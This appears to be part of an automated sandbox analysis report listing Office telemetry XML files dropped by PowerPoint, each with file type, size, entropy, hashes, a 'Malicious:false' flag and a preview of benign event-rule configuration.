                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenUX" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeInfo">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1388
                                                                                                                              Entropy (8bit):4.892406151495341
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9DNDvBuct1k3BNjXMi+EsdnKE+2h6wl/FfxvDb0w9:cxNvBucteNjXMzbdKshBdpr
                                                                                                                              MD5:78F96BD3715A6B21BEA9065844AD9B18
                                                                                                                              SHA1:A947A1B880E4196CE0B68897B7BA8CBB6548D3B4
                                                                                                                              SHA-256:AFE2FB18053098FA826323DC4F96A3E30737493CFD39D1EE8A779F615AA22AAD
                                                                                                                              SHA-512:E5FE65B6E90BB26A7B6CE14885E14354CE848D02E14CDD7E69A13784A1EE9C23F1F7ECC3F98387E68558E6383FA4AB62E63F31C8DA151A5858DA3D9CFFA3C0C2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenUX" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):430
                                                                                                                              Entropy (8bit):5.344372098215696
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd9SpAxhC4FDR6A3AQDvX4zIVlVlr/mz:2d9X7C0DR6YX4zUPlSz
                                                                                                                              MD5:716FF260E6C3196F1C36D3D4B27FA551
                                                                                                                              SHA1:9F6C9F928FCE26ADFDAE3B675F8CA4639D1B6B85
                                                                                                                              SHA-256:4B5DE9AE5DFBC19C7E4C94D755E92595EE6F2BA4799F846C5CF81038F7266011
                                                                                                                              SHA-512:0B5C1DDF6AD52665725DC7CFCFFADBFA03E5E24D48DAAB37E61F4EFBF22D63F1C1AD5DD5690E0B37C46F59D44AE9A1DA4087EB8938B159DDBDEAAD8C67015D08
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70006" V="1" DC="SM" EN="Office.AirSpace.CompositorInitializeFailed" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" SP="CriticalBusinessImpact" S="10" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="10" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. </S>.. <C T="FT" I="0" O="false" N="Column_0">.. <S T="1" F="TimeStamp100ns" />.. </C>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1357
                                                                                                                              Entropy (8bit):4.8523209999839665
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9SQ0DbuMt1k3BNjXMi+EsdnKE+2h6wl/Ffu0HL:cg9buMteNjXMzbdKshBdR
                                                                                                                              MD5:04B5551AF3CCBCDAEAF87B08385A85CB
                                                                                                                              SHA1:ECD482F0F49BC5C13F2219B2DF5E0667E976CE5E
                                                                                                                              SHA-256:ADDFFD162A463E6FF11C1E785AE7FCA441502EB94AE00255F8EEB159D794BE54
                                                                                                                              SHA-512:ABC12322A74F4A1B28697F81CE19801AC807E5BA426024EA46AE8DF85923A77B9965E2B52E42BC8C762B2B8757AA136989E5DA3E3BE8CEDE47A3464ABC456FB4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Excel" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenExcel" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeIn
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1394
                                                                                                                              Entropy (8bit):4.887564911417507
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9dnDbuct1k3BNjXMi+EsdnKE+2h6wl/Ffu0HL:crDbucteNjXMzbdKshBdR
                                                                                                                              MD5:E81DC3B4978D7FB3CBFFB60466586CEC
                                                                                                                              SHA1:85B037C5918D61E55BAFA2314ECFC4130256D33D
                                                                                                                              SHA-256:A4778A5FCDEB41FECCC5B7B22C65A177756CF604540CAA32D438C54FCC137BF8
                                                                                                                              SHA-512:AF5B0DE6B2E18EAAFA822AE62F047C56E6D2CF725EAC3B03336E723723CE914B904E6A74AFBFAB90D8F91AF9D9A63459EA30C8312F1B78B996BED57F3DEAACFD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Excel.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenExcel" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1361
                                                                                                                              Entropy (8bit):4.844205264305739
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9nODuuMt1k3BNjXMi+EsdnKE+2h6wl/Ff3Jo:cd+uuMteNjXMzbdKshBdho
                                                                                                                              MD5:8C537B65624E9473925E7BFD539D0057
                                                                                                                              SHA1:99E9131C1BF99E1B54838C25A679BAEB8A89E018
                                                                                                                              SHA-256:9D7AE3E8D12CCC88142FBAF8F71611DFC1BDF222817A1D4DF13CBC96FB599388
                                                                                                                              SHA-512:74DBDD69B6C92B9015D445ADE17EAD55B3C80EED0CAB38C3EE70E8B15276762126086A439F26DCB5DAFA85F0151175EBA65BA391CA0CA5F5B7BA5E841A9C851E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTy
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1398
                                                                                                                              Entropy (8bit):4.881230354145236
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9cWDuuct1k3BNjXMi+EsdnKE+2h6wl/Ff3Jo:cSGuucteNjXMzbdKshBdho
                                                                                                                              MD5:2D51E0A7AC49363E3A81D790E26DE0B8
                                                                                                                              SHA1:C805B50EA738EA912ECE4C0FFA1E185737BDD613
                                                                                                                              SHA-256:75B05CF3B5E9109797A5B50C1A5421A900F63A3B2FF4CD1F09BF95E10CAE5B16
                                                                                                                              SHA-512:E337E5A329A5090158B9408912F1E7927E4A5370B004E9263CBF78BCD728811C821E32554AFE9B459C7993706F89F61A3B6EA0B0181AB13F890795DC76C3BE25
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1355
                                                                                                                              Entropy (8bit):4.857330168861428
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9TGD+uMt1k3BNjXMi+EsdnKE+2h6wl/Ffo5ex:clW+uMteNjXMzbdKshBdoex
                                                                                                                              MD5:E6A7D8693C2E388B4A8660926A30B077
                                                                                                                              SHA1:3F8E31E6E81FB841456122A44EF75708CD7E61A5
                                                                                                                              SHA-256:0274ACCBB366442A32361E3D835B006E95B2605FAF9ABFA7FDA83BE4F76F1636
                                                                                                                              SHA-512:285D2746ADEC5081C0E002F5004781EDFBB63462473E29CE69F742AA027543914D230D67F3A018D65ED450D23D17E7A7307FF0B0C5B1ADF02991C31F4839AA52
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenWord" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeInfo
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1392
                                                                                                                              Entropy (8bit):4.893667139355208
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9o+D+uct1k3BNjXMi+EsdnKE+2h6wl/Ffo5ex:caO+ucteNjXMzbdKshBdoex
                                                                                                                              MD5:84D89C078EAC8E71196C505308E18804
                                                                                                                              SHA1:6A8BD9C8127F2C6E05E2751A092B3B76D15A1C41
                                                                                                                              SHA-256:5E16DED91429904CAA9721CF2E4E58BEE4C2CEF8D709411657CC65B8E336F227
                                                                                                                              SHA-512:50437940FE9E2E1E1AD40CC348FE6121330D4CC9441847E9F2A978E7A68EECA7DAA0104111D99E7FB720F8A480C8E583D97551D0AE22F185CD1B87A48C8D207F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenWord" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1357
                                                                                                                              Entropy (8bit):4.853300327219875
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9+12DOuMt1k3BNjXMi+EsdnKE+2h6wl/FfAUB7FPEl:cg1mOuMteNjXMzbdKshBdoUZVEl
                                                                                                                              MD5:60679BD5C147299C2B080B13487E0BF9
                                                                                                                              SHA1:F89B2AF60CF8EAEC99A880DB73B5717D00097F13
                                                                                                                              SHA-256:264D9136AEACB5639E8C1C892871D9B59A33916A3E21BD79A931FBDB77499897
                                                                                                                              SHA-512:BD64D5C6A8B2A562D6309C03B7A88A40E951218ACC6048AC7AC30DCCC1FA91BFB39D7C7D8F8036092550C8B33F002951FEE12048A170C1D71FF14A18E493413A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Apple" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenApple" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeIn
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1394
                                                                                                                              Entropy (8bit):4.888371445584959
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9B8JDOuct1k3BNjXMi+EsdnKE+2h6wl/FfAUB7FPEl:cz8ZOucteNjXMzbdKshBdoUZVEl
                                                                                                                              MD5:36D0B7245AD3DF2A692469FEF9906AC4
                                                                                                                              SHA1:CACF79CC1E63FF7C2475769B7BFAD59845B6095E
                                                                                                                              SHA-256:5DDFC08AC8A8436E036E01EC544669475564CDCB6C7CAD873796D216E22F6B2C
                                                                                                                              SHA-512:87ECC750D651F5E27C4C72A9C35108B81B62134C91F09FFD8FC523966613A1C959A343DF533239712DD30E16F0356DD8409AF10C358FC8DBC859C5D26229DBC3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Apple.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenApple" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2891
                                                                                                                              Entropy (8bit):4.110156923652016
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:c9zR6+LX40X4tX4tX4DX4Un5Ktas8qL95a7e9KYD:cJLXbX6XqXMXoND
                                                                                                                              MD5:63A1095E5D539B1C2121A74B32F1F724
                                                                                                                              SHA1:D857AF845795343142FA912D01103BD40A488E50
                                                                                                                              SHA-256:0D5187C1B32DA1AB327723D29B3BCB4C84955F5E7A55D09BC73FA3568F5DA77E
                                                                                                                              SHA-512:BB6D532EE50393BC2074DE211485B9D66BB011E6087441E93110E4D0CAB5CF490B4DA303E9F65B74D425EE5F45C9C2817C0B47AD77A0B33CBDFE509DC4A6A8DA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70025" V="2" DC="SM" EN="Office.AirSpace.OfficeAirSpaceETW.ErrorsAndCriticals" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" DCa="DC" xmlns="">.. <RIS>.. <RI N="Error" />.. </RIS>.. <S>.. <Etw T="1" E="7" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. <Etw T="2" E="10" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. <Etw T="3" E="16" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. <Etw T="4" E="22" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. <Etw T="5" E="23" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. <TR T="6" />.. <TI T="7" I="1min" />.. <A T="8" E="TelemetrySuspend" />.. <A T="9" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="ETW_EventId" />.. </S>.. <S T="2">.. <F N="ETW_EventId" />.. </S>.. <S T="3">.. <F N="ETW_EventId" />.. </S>.. <S T="4">.. <F N="ETW_EventId" />.. </S>.. <S T="5">.. <F N="E
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):517
                                                                                                                              Entropy (8bit):5.281064369241398
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd9nUC4FDR6ArBqX4zIVlVZ6nw/AIQQz:2d9UC0DR6mqX4zUPkQz
                                                                                                                              MD5:041071501ED896DDCE28533357A2B1A7
                                                                                                                              SHA1:3130EF97C021C6AAF4006732F042263F4EC18919
                                                                                                                              SHA-256:F726B8EF8D413D5FF0E9E6F7B854A7218E3F63B69E773094D7AD31675BF90E00
                                                                                                                              SHA-512:F312BF2E030CDE8F7A1E326A784E573E05F7405413A9CFB8C0C6FCD02B2980E80FFCB4DC667C8C3B7A6781B6CDF43D6E0855F067A6947558D544CE7ED40B5910
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70027" V="1" DC="SM" EN="Office.AirSpace.CompositorAreAnimationsDisabledInfo" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="222" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="B" I="1" O="false" N="AreAnimationsDisabled">.. <S T="1" F="AreAnimationsDisabled" />.. </C>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):871
                                                                                                                              Entropy (8bit):5.232421524842378
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd9ko4C4FDR6A3AQ+u4X4zIRVY2HUA82HhIdLLyVhdy9LzX+e/VeX+kdVYLxxS:2d9ko4C0DR6e4X4zT2W2Bk/Mi6e1ouez
                                                                                                                              MD5:ACAF21E2F8A571AA6575D0FE6FE59C1F
                                                                                                                              SHA1:8B767A9F292C76B30291AF37E80EF9DFE18B609B
                                                                                                                              SHA-256:EEC1653F023D36A402C9808FBB04313C9F6CE3CFC51FC0099D17DB96AB1F3C55
                                                                                                                              SHA-512:587344A233E43CFBE87B87F3A1E8152DEE6DBD9ED66533F978D66DA527D803D7192729122E5735DB62FBCE4BD872203B21F410382C90464B9690BAF2D5403556
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70028" V="0" DC="SM" EN="Office.AirSpace.AirSpaceLocalBlocklistInfo" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" SP="CriticalBusinessImpact" DL="B" DCa="DC" xmlns="">.. <S>.. <Etw T="1" E="324" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. </S>.. <C T="B" I="0" O="true" N="AllAppsBlocked">.. <S T="1" F="AllAppsBlocked" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="BlockedDeviceId">.. <S T="1" F="BlockedDeviceId" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="BlockedDriverVersion">.. <S T="1" F="BlockedDriverVersion" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="CrashHistory">.. <S T="1" F="CrashHistory" M="Ignore" />.. </C>.. <C T="D" I="4" O="true" N="SecsBetweenCrashes">.. <S T="1" F="SecsBetweenCrashes" M="Ignore" />.. </C>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):670
                                                                                                                              Entropy (8bit):5.284513748763277
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd91oUnCC4FDR6A3AQ+mX4zI3szGwMdLLzX+e/VeX+kdy9UpX+e/UEpX+4z:2d92iCC0DR6WX4zsMzw/6e1ohceMEc4z
                                                                                                                              MD5:8E59F49F461050D5AD7A7923EBEB62F7
                                                                                                                              SHA1:338A79E5B492E771E9CFE8AF49DE9235049F3544
                                                                                                                              SHA-256:582191D001BB314AA4D540D9B8118EE789BD6212724358947181B2A5903D8AEC
                                                                                                                              SHA-512:2586AE2D1DB9F8D9645C6509FA46EFF0155BF990316BA40D4CEDDD88E8FF47C1153AA6B19F2AC4C80F3447856A483BCB1E1665FEEF6224E2F535726480E35951
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70029" V="0" DC="SM" EN="Office.AirSpace.AirSpaceLocalBlocklistDriverUpdated" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" SP="CriticalBusinessImpact" DL="B" DCa="DC" xmlns="">.. <S>.. <Etw T="1" E="325" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. </S>.. <C T="W" I="0" O="true" N="DeviceId">.. <S T="1" F="DeviceId" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="BlockedDriverVersion">.. <S T="1" F="BlockedDriverVersion" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="UpdatedDriverVersion">.. <S T="1" F="UpdatedDriverVersion" M="Ignore" />.. </C>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1363
                                                                                                                              Entropy (8bit):4.868166210989903
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9ojSDCuMt1k3BNjXMi+EsdnKE+2h6wl/Ff/T/:cGjyCuMteNjXMzbdKshBd3T/
                                                                                                                              MD5:B3B03A6FE19CF621FDF415BFA553715C
                                                                                                                              SHA1:039F93A49E14DF747ABAD57BCFF8AD2067C3C859
                                                                                                                              SHA-256:DAA7638D78B260CAE49F9542B3A4C4851CD7CFFFE89B7FA90247BC2EB8D79219
                                                                                                                              SHA-512:2488A9CB946F89FFAB0B8E3EFCACDCDFA5C8471195D4D5C2DFEACAD83C7142A92FA3DB98C249A8E162F4EC7229F2DDE18E1FEFF625785B3744D9A478C24460C2
